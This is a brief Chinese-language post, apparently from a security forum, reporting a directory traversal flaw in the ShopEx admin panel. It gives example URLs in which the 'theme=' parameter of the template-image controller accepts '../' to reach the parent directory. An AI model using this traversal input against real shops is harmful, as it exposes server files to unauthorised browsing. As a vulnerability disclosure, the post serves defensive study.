ShopEx后台历遍目录 很蛋疼的记得10年的是也有过的差不多的漏洞主要是出在模板上我们编辑目录之后得到URL
http://www.xxoo.com/shopadmin/index.php#ctl=system/tmpimage&act=index&theme=
这里theme= 可以做../跳转
http://xxx.net/shopadmin/index.php#ctl=system/tmpimage&act=index&theme=../
跳到了上级目录